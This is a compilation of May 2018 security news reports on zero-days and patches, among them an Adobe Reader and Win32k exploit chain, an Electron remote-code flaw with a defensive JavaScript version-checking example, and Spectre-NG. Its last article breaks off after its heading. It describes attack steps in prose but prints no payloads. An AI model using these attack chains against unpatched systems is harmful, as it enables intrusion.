“The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed,” states the report published by ESET.

The attack chain consists of the following steps:

The victim receives and opens a weaponized PDF file
Once the PDF is opened, malicious JavaScript code executes
The JavaScript code manipulates a button object
The button object contains a specially crafted JPEG2000 image that triggers a double-free vulnerability in Adobe Acrobat/Reader
The JavaScript code uses heap-spray techniques to obtain read and write access to memory
The JavaScript code then interacts with Adobe Reader’s JavaScript engine
The attacker uses the engine’s native code (ROP gadgets) to execute their own native shellcode
The shellcode initializes a PE file embedded in the PDF
Having exploited the Reader vulnerability, the attacker uses the Windows zero-day to escape the sandbox: the Win32k flaw lets the dropped PE file elevate its privileges and run code in kernel mode, escaping the Acrobat/Reader sandbox and gaining system-level access.
Dangerous as the chain is, its developers let the security community catch it by uploading the sample to a public malware-scanning service, apparently to test its evasion capability.


The two zero-days have been already patched, Microsoft addressed the CVE-2018-8120 with the release of the May 2018 Patch Tuesday, Adobe patched the CVE-2018-4990 this week.
“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concludes the report.
“Even though the sample does not contain a real malicious final payload, which may suggest that it was caught during its early development stages, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”


Adobe Patches Two Dozen Critical Flaws in Acrobat, Reader
14.5.2018 securityweek
Vulnerebility

Updates released on Monday by Adobe for its Acrobat, Reader and Photoshop products patch nearly 50 vulnerabilities, including critical flaws that allow arbitrary code execution.

A total of 47 security holes have been addressed in the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017. The flaws have been resolved with the release of versions 2018.011.20040, 2017.011.30080 and 2015.006.30418.

The vulnerabilities include 24 critical memory corruptions that allow arbitrary code execution in the context of the targeted user, and various types of “important” issues that can lead to information disclosure or security bypasses.

Independent experts and researchers from Cisco Talos, ESET, Kaspersky, Check Point, Palo Alto Networks, Tencent, Knownsec 404 Security Team, Cybellum and Cure53 have been credited for responsibly disclosing the flaws patched with the latest Acrobat and Reader releases. Many of the security bugs were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

Adobe also informed customers that support for Acrobat and Reader 11.x ended on October 15, 2017, and that version 11.0.23 is the final release for these branches. Users have been advised to update to the latest versions of Acrobat DC and Acrobat Reader DC.

Adobe has also released security updates for the Windows and macOS versions of Photoshop CC to address a flaw reported by researcher Giwan Go.

Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4 fix a critical out-of-bounds write issue that can be exploited for arbitrary code execution in the context of the targeted user.

Earlier this month, Adobe patched several vulnerabilities in its Flash Player, Creative Cloud and Connect products with the company’s Patch Tuesday updates.

The previous round of security updates for Acrobat and Reader resolved 39 vulnerabilities. However, those updates had been assigned a priority rating of “2,” which indicates that exploitation is less likely, while the latest patches carry a priority rating of “1,” which means exploitation is more likely and users should update as soon as possible.


Code Execution Flaw in Electron Framework Could Affect Many Apps
14.5.2018 securityweek
Vulnerebility

GitHub’s open source development framework Electron is affected by a vulnerability that can allow remote code execution. Technical details and proof-of-concept (PoC) code were made public last week by the researcher who discovered the issue.

Electron allows developers to create cross-platform desktop applications using HTML, CSS and JavaScript. The framework has been used in the development of hundreds of applications, including Skype, GitHub Desktop, Slack, WhatsApp, Signal, Discord and WordPress.com.

Trustwave researcher Brendan Scarvell discovered earlier this year that certain applications created with Electron may allow remote code execution if they are affected by cross-site scripting (XSS) vulnerabilities and configured in a specific way.

“Electron applications are essentially web apps, which means they're susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js' built in modules. This makes XSS particularly dangerous, as an attacker's payload can allow do some nasty things such as require in the child_process module and execute system commands on the client-side,” the researcher explained in a blog post. “You can remove access to Node.js by passing nodeIntegration: false into your application's webPreferences.”

Scarvell found that if an application is affected by an XSS flaw and certain options have not been manually set in the app’s webPreferences, an attacker can re-enable nodeIntegration during runtime and execute system commands.

The vulnerability, tracked as CVE-2018-1000136, was patched by Electron developers in March with the release of versions 1.7.13, 1.8.4, and 2.0.0-beta.4. The security hole can also be mitigated by adding a piece of code provided by Electron.

The Signal messaging app and the Brave web browser are reportedly not impacted by this flaw.


UK mobile operator EE left a critical code system exposed with a default password
13.5.2018 securityaffairs
Vulnerebility

EE, the largest mobile network in the UK with some 30 million customers, left a critical code system exposed online behind a default password.
EE, a British mobile network giant owned by BT Group, has been accused of leaving a critical code repository on an open-source tool protected only by a default username and password.

The discovery was made by a security researcher who tweets as “six”: he found two million lines of code, including credentials for the company’s private employee and developer APIs and Amazon Web Services secret keys.

“One of the largest mobile networks in Britain, EE, which is also owned by BT Group, was accused of risking the safety of a critical code repository due to bad security. Apparently, the company left the repository protected only by a default login info, according to one researcher.” reported the koddos.net website.

six
@lol_its_six
After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over 2 million lines of private source code to their systems and employee systems, due to using an admin:admin user/pass combination - 1

6:02 PM - May 10, 2018

six
@lol_its_six
Access to this allows malicious hackers to analyze source code and identify vulnerabilities within. Actually; there's no need, since you can just view the code and take AWS keys, API keys, and more. Also; pushing to prod with 167 vulnerabilities???? (MyEE-Web master) - 2 pic.twitter.com/jyLEBt2f0w

6:03 PM - May 10, 2018

With the code and keys in hand, attackers could analyze the company’s employee and payment systems to find vulnerabilities to exploit.

According to the researcher, payment information, including credit card data, is at risk.

six
@lol_its_six
You trust these guys with your credit card details, while they do not care about security, or customer privacy. Picture below shows access keys to authorize to their employee tool, for customer lookups. pic.twitter.com/clG4wsFcAM

6:05 PM - May 10, 2018

The code was exposed on a SonarQube instance, an open source code-analysis platform, hosted on an EE subdomain and used by the company to find bugs and security vulnerabilities in the code of its website.

According to the researcher, he reported the leak to EE several times over a period of weeks, but the company did not reply.

“After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over two million lines of private source code to their systems and employee systems, due to using an ‘admin:admin’ user/pass combination,” six tweeted.


A company spokesperson told ZDNet that the researcher’s claims were overstated and that no customer or payment data was at risk.

According to the spokesperson, the exposed material was development code containing no information about the production infrastructure.

The company has since changed the password and taken the service offline.

“Our final code then goes through further checks, processes, and review from our security team before being published,” the spokesperson said. “This development code does not contain any information pertaining to our production infrastructure or production API credentials as these are maintained in separate secure systems and details are changed by a separate team.”

“We take the security of our customer data extremely seriously and would like to thank the researcher for bringing this issue to our attention. We’re conducting a thorough investigation to make sure this does not happen again,” the spokesperson told ZDNet.


A new flaw in Electron poses a risk to apps based on the framework
13.5.2018 securityaffairs
Vulnerebility

Security experts have discovered a vulnerability in the Electron software framework that has been used for building a large number of popular desktop applications.
Popular desktop applications, including Skype, Slack, GitHub Desktop, Twitch, WordPress.com, and others, are potentially affected.

Electron is an open-source framework built on Node.js, V8 and Chromium that lets developers use web technologies such as JavaScript, HTML and CSS to build desktop apps.

When building apps on Electron, developers can use the Electron APIs as well as the Node.js APIs and their modules.

The Node.js APIs and built-in modules give developers deeper integration with the operating system and access to more OS features.

To limit abuse of those OS features, the Electron team provides a setting that cuts the web content in a window off from Node.js.

“Electron applications are essentially web apps, which means they’re susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js’ built in modules.” reads the analysis published by Trustwave. “This makes XSS particularly dangerous, as an attacker’s payload can allow do some nasty things such as require in the child_process module and execute system commands on the client-side.”

Developers can set “nodeIntegration: false” in a window’s webPreferences to deny the loaded HTML and JavaScript access to the Node.js APIs and modules; a default Electron app, which does not set it, exposes them.

The WebView tag feature allows developers to embed content, such as web pages, into an Electron application and run it as a separate process.

“When using a WebView tag you are also able to pass in a number of attributes, including nodeIntegration. WebView containers do not have nodeIntegration enabled by default.” continues the analysis.

Declaring webviewTag: false in webPreferences disables the WebView tag, and with it the ability to turn nodeIntegration on from a WebView. The problem was that when developers did not declare webviewTag at all, Electron did not treat it as disabled, even with nodeIntegration set to false.

Trustwave researcher Brendan Scarvell discovered that it is possible to turn the nodeIntegration option back to “true” at runtime, which gives injected code access to the Node.js APIs and modules and so to the OS features behind them.

Scarvell explained that if the developers of an Electron-based app have not explicitly set the “webviewTag: false” option in the webPreferences config, an attacker can exploit a cross-site scripting (XSS) vulnerability inside the app to create a new WebView component window with changed settings and set the nodeIntegration flag to “true.”


The expert published proof-of-concept code that could be used by an attacker to exploit any XSS flaw and gain access to the underlying OS.

“If you find an Electron application with the nodeIntegration option disabled and it contains either an XSS vulnerability through poor sanitization of user input or a vulnerability in another dependency of the application, the above proof-of-concept can allow for remote code execution provided that the application is using a vulnerable version of Electron (version < 1.7.13, < 1.8.4, or < 2.0.0-beta.3), and hasn’t manually opted into one of the following:

Declared webviewTag: false in its webPreferences.
Enabled the nativeWindowOption option in its webPreferences.
Intercepting new-window events and overriding event.newGuest without using the supplied options tag.” continues the analysis.
Scarvell reported the vulnerability to Electron team that addressed it in March.
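The preconditions in the quoted list, together with the patched releases named in the securityweek report on the same flaw earlier on this page (1.7.13, 1.8.4, 2.0.0-beta.4), can be turned into an audit check. The following is an added example, not Electron’s or Trustwave’s code: a small version comparator that understands prerelease tags, and a function that applies the opt-outs to an app’s Electron version and webPreferences. The option the quote calls “nativeWindowOption” is `nativeWindowOpen` in Electron’s API; treating lines older than 1.7 as unfixed, and the `handlesNewWindow` flag standing in for a custom new-window handler, are assumptions made for the example.

```javascript
// Added example, not Electron's or Trustwave's code: apply the CVE-2018-1000136
// preconditions from the Trustwave write-up to an app's version and webPreferences.

// "2.0.0-beta.4" -> { nums: [2, 0, 0], preParts: ['beta', 4] }; "1.8.4" -> preParts null
function parseVersion(v) {
  const [core, pre] = v.split('-', 2);
  const nums = core.split('.').map(Number);
  const preParts = pre === undefined
    ? null
    : pre.split('.').map(p => (/^\d+$/.test(p) ? Number(p) : p));
  return { nums, preParts };
}

// semver ordering: numeric core first; a release outranks any prerelease of the
// same core; prerelease identifiers compare left to right, numbers before words.
function compareVersions(a, b) {
  const A = parseVersion(a), B = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    const d = (A.nums[i] || 0) - (B.nums[i] || 0);
    if (d !== 0) return Math.sign(d);
  }
  if (!A.preParts && !B.preParts) return 0;
  if (!A.preParts) return 1;
  if (!B.preParts) return -1;
  const n = Math.max(A.preParts.length, B.preParts.length);
  for (let i = 0; i < n; i++) {
    const x = A.preParts[i], y = B.preParts[i];
    if (x === undefined) return -1;
    if (y === undefined) return 1;
    if (x === y) continue;
    if (typeof x === 'number' && typeof y === 'number') return Math.sign(x - y);
    if (typeof x === 'number') return -1;
    if (typeof y === 'number') return 1;
    return x < y ? -1 : 1;
  }
  return 0;
}

// [first version of the line, first fixed version]. Lines before 1.7 are treated
// as never fixed (assumption: no backport for them).
const FIX_RANGES = [
  ['0.0.0', '1.7.13'],
  ['1.8.0', '1.8.4'],
  ['2.0.0-beta.1', '2.0.0-beta.4'],
];

function electronVersionIsFixed(version) {
  for (const [from, fixed] of FIX_RANGES) {
    if (compareVersions(version, from) >= 0 && compareVersions(version, fixed) < 0) return false;
  }
  return true;
}

// handlesNewWindow models "intercepting new-window events and overriding
// event.newGuest without using the supplied options" (assumed flag name).
function assessElectronApp({ version, webPreferences = {}, handlesNewWindow = false }) {
  if (webPreferences.nodeIntegration !== false) {
    return { exposed: true, reason: 'nodeIntegration is not disabled: any XSS already reaches Node.js' };
  }
  if (electronVersionIsFixed(version)) {
    return { exposed: false, reason: `Electron ${version} carries the fix` };
  }
  if (webPreferences.webviewTag === false) {
    return { exposed: false, reason: 'webviewTag: false blocks the webview re-enable trick' };
  }
  if (webPreferences.nativeWindowOpen === true) {
    return { exposed: false, reason: 'nativeWindowOpen is enabled' };
  }
  if (handlesNewWindow) {
    return { exposed: false, reason: 'new-window events are intercepted' };
  }
  return { exposed: true, reason: `Electron ${version}: nodeIntegration off but no opt-out, XSS can re-enable it via a webview` };
}

console.log(assessElectronApp({ version: '1.8.3', webPreferences: { nodeIntegration: false } }));
console.log(assessElectronApp({ version: '1.8.3', webPreferences: { nodeIntegration: false, webviewTag: false } }));
console.log(assessElectronApp({ version: '2.0.0-beta.4', webPreferences: { nodeIntegration: false } }));
```

The first branch matters as much as the CVE: an app that never set nodeIntegration to false is not “vulnerable to CVE-2018-1000136”, it is simply an app in which any XSS is already code execution, which is the point the Trustwave quote opens with.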


Chrome 66 Update Patches Critical Security Flaw
11.5.2018 securityweek
Vulnerebility

An updated version of Chrome 66 is now available, which addresses a Critical security vulnerability that could allow an attacker to take over a system.

A total of 4 security vulnerabilities were addressed in the latest browser release, three of which were reported by external researchers.

The most important of the vulnerabilities are two High severity flaws that chain together to result in a sandbox escape. The issues include CVE-2018-6121, a privilege escalation in extensions, and CVE-2018-6122, a type confusion in V8.

The vulnerability chain was reported by an anonymous researcher on April 23. Google hasn’t published information on the flaw, but it appears that a remote attacker could exploit it to take control of vulnerable systems.

Another vulnerability resolved in the new browser iteration is CVE-2018-6120, a heap buffer overflow in PDFium reported by Zhou Aiting of Qihoo 360 Vulcan Team. The security researcher received a $5,000 reward for the finding.

The updated browser is available for download as version 66.0.3359.170 for Windows, Mac, and Linux devices.

This is the second time Google patches a Critical bug in Chrome 66 since the browser’s release in the stable channel less than a month ago.

In late April, the Internet giant addressed a use-after-free in Media Cache that could be exploited by a malicious actor to cause denial of service and possibly execute arbitrary code. The bug was reported by security researcher Ned Williamson, who received a $10,500 reward for the discovery.

The first stable release of Chrome 66 arrived with fixes for 62 security vulnerabilities, including two use after free in Disk Cache rated Critical severity (CVE-2018-6085 and CVE-2018-6086). Both issues were reported by Ned Williamson.


Rockwell Automation Patches Flaws in Simulation, Licensing Tools
11.5.2018 securityweek
Vulnerebility

Rockwell Automation has released updates for its Arena and FactoryTalk Activation Manager products to address various types of vulnerabilities, including a critical flaw that can allow remote code execution.

Both ICS-CERT and Rockwell Automation have released advisories describing the security holes and mitigations, but the vendor's advisories are only available to registered users.

FactoryTalk Activation Manager, a tool designed for managing licensed content and activating Rockwell software products, uses the Wibu-Systems CodeMeter and FlexNet Publisher license management applications.

Wibu-Systems CodeMeter is affected by a cross-site scripting (XSS) vulnerability that can be exploited to inject arbitrary code via a field in a configuration file, allowing attackers to access sensitive information or alter the impacted HTML page. The issue is tracked as CVE-2017-13754 and is considered low severity.

FlexNet Publisher, on the other hand, is affected by a critical buffer overflow (CVE-2015-8277) that can allow a remote attacker to execute arbitrary code.

"A custom string copying function of Imgrd.exe (the license server manager in FlexNet Publisher) and flexsvr.exe does not use proper bounds checking on incoming data, potentially allowing a remote, unauthenticated user to send crafted messages with the intent of causing a buffer overflow," Rockwell said in its advisory.

The vulnerabilities impact FactoryTalk Activation Manager 4.00.02 and 4.01, which include Wibu-Systems CodeMeter v6.50b and earlier, and FactoryTalk Activation Manager v4.00.02 and earlier, which include FlexNet Publisher v11.11.1.1 and earlier.

FactoryTalk Activation Manager is used by more than two dozen Rockwell products – users can consult a list provided by the vendor and ICS-CERT to see if they are affected. Updating Activation Manager to version 4.02 patches the vulnerabilities. Alternatively, CodeMeter can be updated to a compatible version.

Separate advisories published recently by Rockwell and ICS-CERT describe a medium severity denial-of-service (DoS) vulnerability affecting Arena, a simulation software for the manufacturing sector. Arena is designed to help organizations identify process bottlenecks, evaluate process changes, improve logistics, and increase throughput.

Researcher Ariele Caltabiano informed Rockwell through Trend Micro’s Zero Day Initiative (ZDI) that Arena is affected by a use-after-free vulnerability that can be exploited to crash the software by convincing the targeted user to open a specially crafted file. Crashing the application could lead to the user losing unsaved data.

Rockwell says the flaw, tracked as CVE-2018-8843, affects Arena Simulation Software for Manufacturing versions 15.10.00 and earlier, and it has been patched with the release of version 15.10.01.


Microsoft Issues Emergency Patch For Critical Flaw In Windows Containers
11.5.2018 thehackernews
Vulnerebility

Just a few days prior to its monthly patch release, Microsoft released an emergency patch for a critical vulnerability in the Windows Host Compute Service Shim (hcsshim) library that could allow remote attackers to run malicious code on Windows computers.
Windows Host Compute Service Shim (hcsshim) is an open source library that helps "Docker for Windows" execute Windows Server containers using a low-level container management API in Hyper-V.
Discovered by Swiss developer and security researcher Michael Hanselmann, the critical vulnerability (tracked as CVE-2018-8115) is the result of the failure of the hcsshim library to properly validate input when importing a Docker container image.
This, in turn, allows an attacker to remotely execute arbitrary code on the Windows host operating system, eventually letting the attacker create, remove, and replace files on the target host.
As Hanselmann explained in his personal blog, "Importing a Docker container image or pulling one from a remote registry isn't commonly expected to make modifications to the host file system outside of the Docker-internal data structures."
Hanselmann reported the issue to Microsoft in February this year, and the tech giant fixed the vulnerability a few days before this month’s patch Tuesday by releasing an updated version of hcsshim.
Although the vulnerability has been assigned a critical severity rating, Microsoft says exploitation of this issue is unlikely.
"To exploit the vulnerability, an attacker would place malicious code in a specially crafted container image which, if an authenticated administrator imported (pulled), could cause a container management service utilizing the Host Compute Service Shim library to execute malicious code on the Windows host," Microsoft says in its advisory.
The patch for this vulnerability addresses the way hcsshim validates input from Docker container images, therefore blocking the loading of malicious code in specially crafted files.
An updated version 0.6.10 of the Windows Host Compute Service Shim (hcsshim) file is available right now for download from GitHub.
Full details of the vulnerability have not been released yet, but Hanselmann promises to publish in-depth technical details and a proof-of-concept exploit for the flaw on May 9, following an agreement with Microsoft security response center.
Microsoft's May 2018 Patch Tuesday has been scheduled for release on May 8.


8 New Spectre-Class Vulnerabilities (Spectre-NG) Found in Intel CPUs
11.5.2018 thehackernews
Vulnerebility

A team of security researchers has reportedly discovered a total of eight new "Spectre-class" vulnerabilities in Intel CPUs, which also affect at least a small number of ARM processors and may impact AMD processor architecture as well.
Dubbed Spectre-Next Generation, or Spectre-NG, the partial details of the vulnerabilities were first leaked to journalists at German computer magazine Heise, which claims that Intel has classified four of the new vulnerabilities as "high risk" and remaining four as "medium."
The new CPU flaws reportedly originate from the same design issue that caused the original Spectre flaw, but the report claims one of the newly discovered flaws allows attackers with access to a virtual machine (VM) to easily target the host system, making it potentially more threatening than the original Spectre vulnerability.
"Alternatively, it could attack the VMs of other customers running on the same server. Passwords and secret keys for secure data transmission are highly sought-after targets on cloud systems and are acutely endangered by this gap," the report reads.
"However, the aforementioned Spectre-NG vulnerability can be exploited quite easily for attacks across system boundaries, elevating the threat potential to a new level. Cloud service providers such as Amazon or Cloudflare and, of course, their customers are particularly affected."
If you're unaware, the Spectre vulnerability, reported earlier this year, relies on a side-channel attack against a processor's speculative execution engine, allowing a malicious program to read sensitive information such as passwords and encryption keys, including the kernel's.
Although the German site did not disclose the name of the security researchers (or the team/company) who reported these flaws to Intel, it revealed one of the weaknesses was discovered by a security researcher at Google's Project Zero.
The site also claimed that the Google security researcher reported the flaw to the chip manufacturers almost 88 days ago—which indicates the researcher would possibly reveal the details of at least one flaw on May 7th, when the 90-day disclosure window will be closed, which is the day before the Windows Patch Tuesday.
Responsibly disclosing the Spectre-NG vulnerabilities to vendors is definitely good practice, but the researchers who discovered this new series of Spectre-class flaws seem to be keeping their names out of the news for now, perhaps to avoid the media criticism CTS Labs faced after disclosing partial details of AMD flaws with a dedicated website, polished graphics, and videos.
Intel's Response to Spectre-NG Flaws
When asked about the new findings, Intel provided the following statement, which neither confirms nor denies the existence of the Spectre-NG vulnerabilities:
"Protecting our customers' data and ensuring the security of our products are critical priorities for us. We routinely work closely with customers, partners, other chip makers and researchers to understand and mitigate any issues that are identified, and part of this process involves reserving blocks of CVE numbers."
"We believe strongly in the value of coordinated disclosure and will share additional details on any potential issues as we finalize mitigations. As a best practice, we continue to encourage everyone to keep their systems up-to-date."
Meanwhile, when Heise was asked about the Common Vulnerabilities and Exposures (CVE) numbers reserved for the new Spectre-NG vulnerabilities, the journalist refused to share any details and commented:
"The CVEs are currently only naked numbers without added value. On the other hand, their publication might have meant a further risk to our sources that we wanted to avoid. That's why we decided against it at the moment. We will submit the course, of course."
Brace For New Security Patches
The Spectre-NG vulnerabilities reportedly affect Intel CPUs, and there are also indications that at least some ARM processors are vulnerable to the issues, but the impact on AMD processors has yet to be confirmed.
According to the German site, Intel has already acknowledged the new Spectre-NG vulnerabilities and is planning to release security patches in two batches: one in May and a second currently scheduled for August.
Microsoft also plans to fix the issues by releasing a security patch with Windows updates in the upcoming months.
However, it’s currently unknown if applying new patches would once again impact the performance of vulnerable devices, just like what happened with the original Spectre and Meltdown vulnerabilities earlier this year.


Microsoft Patches Two Zero-Day Flaws Under Active Attack
11.5.2018 thehackernews 
Attack  Vulnerebility 

It's time to gear up for the latest May 2018 Patch Tuesday.
Microsoft has today released security patches for a total of 67 vulnerabilities, including two zero-days that have actively been exploited in the wild by cybercriminals, and two publicly disclosed bugs.
In brief, Microsoft is addressing 21 vulnerabilities that are rated as critical, 42 rated important, and 4 rated as low severity.
These patch updates address security flaws in Microsoft Windows, Internet Explorer, Microsoft Edge, Microsoft Office, Microsoft Office Exchange Server, Outlook, .NET Framework, Microsoft Hyper-V, ChakraCore, Azure IoT SDK, and more.
1) Double Kill IE 0-day Vulnerability
The first zero-day vulnerability (CVE-2018-8174) under active attack is a critical remote code execution vulnerability that was revealed by Chinese security firm Qihoo 360 last month and affected all supported versions of Windows operating systems.
Dubbed "Double Kill" by the researchers, the vulnerability is notable and requires prompt attention as it could allow an attacker to remotely take control over an affected system by executing malicious code remotely through several ways, such as a compromised website, or malicious Office documents.
The Double Kill vulnerability is a use-after-free issue which resides in the way the VBScript Engine (included in all currently supported versions of Windows) handles objects in computer memory, allowing attackers to execute code that runs with the same system privileges as of the logged-in user.
"In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked 'safe for initialization' in an application or Microsoft Office document that hosts the IE rendering engine," Microsoft explains in its advisory.
"The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability."
Users with administrative rights on their systems are impacted more than the ones with limited rights, as an attacker successfully exploiting the vulnerability could take control of an affected system.

However, that doesn't mean that low-privileged users are spared. If users are logged in on an affected system with more limited rights, attackers may still be able to escalate their privileges by exploiting a separate vulnerability.
Researchers from Qihoo 360 and Kaspersky Labs found that the vulnerability was actively being exploited in the wild by an advanced state-sponsored hacking group in targeted attacks, but neither Microsoft nor Qihoo 360 and Kaspersky provided any information on the threat group.
2) Win32k Elevation of Privilege Vulnerability
The second zero-day vulnerability (CVE-2018-8120) patched this month is a privilege-escalation flaw that occurred in the Win32k component of Windows when it fails to properly handle objects in computer memory.
Successful exploitation of the flaw can allow attackers to execute arbitrary code in kernel mode, eventually allowing them to install programs or malware; view, edit or delete data; or create new accounts with full user rights.
The vulnerability is rated "important," and only affects Windows 7, Windows Server 2008 and Windows Server 2008 R2. The issue has actively been exploited by threat actors, but Microsoft did not provide any detail about the in-the-wild exploits.
Two Publicly Disclosed Flaws
Microsoft also addressed two "important" Windows vulnerabilities whose details have already been made public.
One of these is a Windows kernel flaw (CVE-2018-8141) that could lead to information disclosure, and the other is a Windows Image bug (CVE-2018-8170) that could lead to Elevation of Privilege.
In addition, the May 2018 updates resolve 20 more critical issues, including memory corruptions in the Edge and Internet Explorer (IE) scripting engines and remote code execution (RCE) vulnerabilities in Hyper-V and Hyper-V SMB.
Meanwhile, Adobe has also released its Patch Tuesday updates, addressing five security vulnerabilities—one critical bug in Flash Player, one critical and two important flaws in Creative Cloud and one important bug in Connect.
Users are strongly advised to install security updates as soon as possible in order to protect themselves against the active attacks in the wild.
To install security updates, go to Settings → Update & security → Windows Update → Check for updates, or install the updates manually.


Many Vulnerabilities Found in OPC UA Industrial Protocol
10.5.2018 securityweek
Vulnerebility

Researchers at Kaspersky Lab have identified a significant number of vulnerabilities in the OPC UA protocol, including flaws that could, in theory, be exploited to cause physical damage in industrial environments.

Developed and maintained by the OPC Foundation, OPC UA stands for Open Platform Communications Unified Automation. The protocol is widely used in industrial automation, including in industrial control systems (ICS) and for communications between Industrial Internet-of-Things (IIoT) and smart city systems.

Researchers at Kaspersky Lab, which is a member of the OPC Foundation consortium, have conducted a detailed analysis of OPC UA and discovered many vulnerabilities, including ones that can be exploited for remote code execution and denial-of-service (DoS) attacks.

There are several implementations of OPC UA, but experts focused on the OPC Foundation’s implementation – for which source code is publicly available – and third-party applications using the OPC UA Stack.

A total of 17 vulnerabilities have been identified in the OPC Foundation’s products and several flaws in commercial applications that use these products. Most of the issues were discovered through fuzzing.

Exploitation of the vulnerabilities depends on how the targeted network is configured, but in most cases, it will require access to the local network, Kaspersky researchers Pavel Cheremushkin and Sergey Temnikov told SecurityWeek in an interview at the company’s Security Analyst Summit in March. The experts said they had never seen a configuration that would allow attacks directly from the Internet.

An attacker first has to identify a service that uses OPC UA, and then send it a payload that triggers a DoS condition or remote code execution. Remote code execution vulnerabilities can be leveraged by attackers to move laterally within the network, control industrial processes, and to hide their presence. However, DoS attacks can have an even more significant impact in the case of industrial systems.

“In industrial systems, denial-of-service vulnerabilities pose a more serious threat than in any other software,” Cheremushkin and Temnikov wrote in a report published on Thursday. “Denial-of-service conditions in telemetry and telecontrol systems can cause enterprises to suffer financial losses and, in some cases, even lead to the disruption and shutdown of the industrial process. In theory, this could cause harm to expensive equipment and other physical damage.”

All the security holes were reported to the OPC Foundation and their respective developers and patches were released. Applying the patches is not difficult considering that the OPC Stack is a DLL file and updates are performed simply by replacing the old file with the new one.

The OPC Foundation has released advisories for the security holes discovered by Kaspersky researchers, but grouped all the issues under two CVE identifiers: CVE-2017-17433 and CVE-2017-12069. The latter also impacts automation and power distribution products from Siemens, which has also published an advisory.

“Based on our assessment, the current OPC UA Stack implementation not only fails to protect developers from trivial errors but also tends to provoke errors – we have seen this in real-world examples. Given today’s threat landscape, this is unacceptable for products as widely used as OPC UA. And this is even less acceptable for products designed for industrial automation systems,” researchers said.


LG Patches Serious Vulnerabilities in Smartphone Keyboard
10.5.2018 securityweek
Vulnerebility

Updates released this week by LG for its Android smartphones patch two high severity keyboard vulnerabilities that can be exploited for remote code execution.

The vulnerabilities were reported to LG late last year by Slava Makkaveev of Check Point Research. The electronics giant patched them with its May 2018 updates, which also include the latest security fixes released by Google for the Android operating system (security patch level 2018-05-01).

According to Check Point, the flaws affect the default keyboard (LG IME) shipped with all mainstream LG smartphones. Researchers successfully reproduced and exploited the security holes on LG G4, G5 and G6 devices.

An attacker could exploit the flaws to remotely execute arbitrary code with elevated privileges by manipulating the keyboard update process, specifically for the MyScript handwriting feature. Hackers can leverage the weaknesses to log keystrokes and capture credentials and other potentially sensitive data.

The first vulnerability is related to installing new languages or updating existing ones. The device obtains the necessary files from a hardcoded server over an HTTP connection, which allows a man-in-the-middle (MitM) attacker to deliver a malicious file instead of the legitimate update.

The second flaw can be exploited by an MitM attacker to control the location where a file is downloaded. A path traversal issue allows hackers to place a malicious file in the LG keyboard package sandbox by including the targeted location in the name of the file.

If the file is assigned a .so extension, it will be granted executable permissions. In order to get the keyboard app to load the malicious file, the attacker can appoint it as an “input method extension library” in the keyboard configuration file. The malware will be loaded as soon as the keyboard application is restarted.

LG noted in its advisory that the vulnerabilities only impact the MyScript handwriting feature.

Reports published last year showed that LG had a 20 percent market share in the U.S. and 4 percent globally. This means there are plenty of devices that hackers could target using the vulnerabilities discovered by Check Point. On the other hand, there are also many critical and high severity flaws in Android itself that hackers could try to exploit and those can pose a bigger risk considering that they could be weaponized against multiple Android smartphone brands.


Lenovo releases updates to fix Secure Boot flaw in servers and other issues
10.5.2018 securityaffairs 
Vulnerebility

Lenovo has released security patches that address the High severity vulnerability CVE-2017-3775 in the Secure Boot function on some System x servers.
Standard operator configurations disable signature checking, which means that some System x BIOS/UEFI versions do not properly authenticate signed code before booting it.

“Lenovo internal testing discovered some System x server BIOS/UEFI versions that, when Secure Boot mode is enabled by a system administrator, do not properly authenticate signed code before booting it. As a result, an attacker with physical access to the system could boot unsigned code.” reads the security advisory.

“Lenovo ships these systems with Secure Boot disabled by default, because signed code is relatively new in the data center environment, and standard operator configurations disable signature checking.”

An attacker can exploit the vulnerability to execute code that has not been authenticated at boot time on the affected system. CVE-2017-3775 impacts a dozen models, including Flex System x240 M5, x280 X6, x480 X6, x880, x3xxx series, and NeXtScale nx360 M5 devices.

Lenovo disclosed the complete list of impacted products and provided the related BIOS/UEFI updates; it also explained that these systems ship with Secure Boot disabled by default.


Lenovo also issued a patch for CVE-2018-9063, a buffer overflow in the Lenovo System Update Drive Mapping Utility. The flaw could be exploited for different kinds of attacks, including execution of arbitrary code on the target machine.

“MapDrv (C:\Program Files\Lenovo\System Update\mapdrv.exe) contains a local vulnerability where an attacker entering very large user ID or password can overrun the program’s buffer, causing undefined behaviors, such as execution of arbitrary code.” reads the security advisory.

“No additional privilege is granted to the attacker beyond what is already possessed to run MapDrv.”

The flaw could be easily triggered by an attacker entering a very large user ID or password to overrun the program's buffer; the attacker could potentially execute code with MapDrv's privileges.

Users need to update the application to Lenovo System Update version 5.07.0072 or later.

Users can launch Lenovo System Update to automatically check for newer versions and accept the update if one is present; otherwise the application can be updated manually by downloading the latest version from the company website.


Analysis of CVE-2018-8174 VBScript 0day and APT actor related to Office targeted attack
10.5.2018 securityaffairs 
Vulnerebility

Recently, the Advanced Threat Response Team of 360 Core Security Division detected an APT attack exploiting a 0-day vulnerability tracked as CVE-2018-8174. Now the experts published a detailed analysis of the flaw.
I Overview
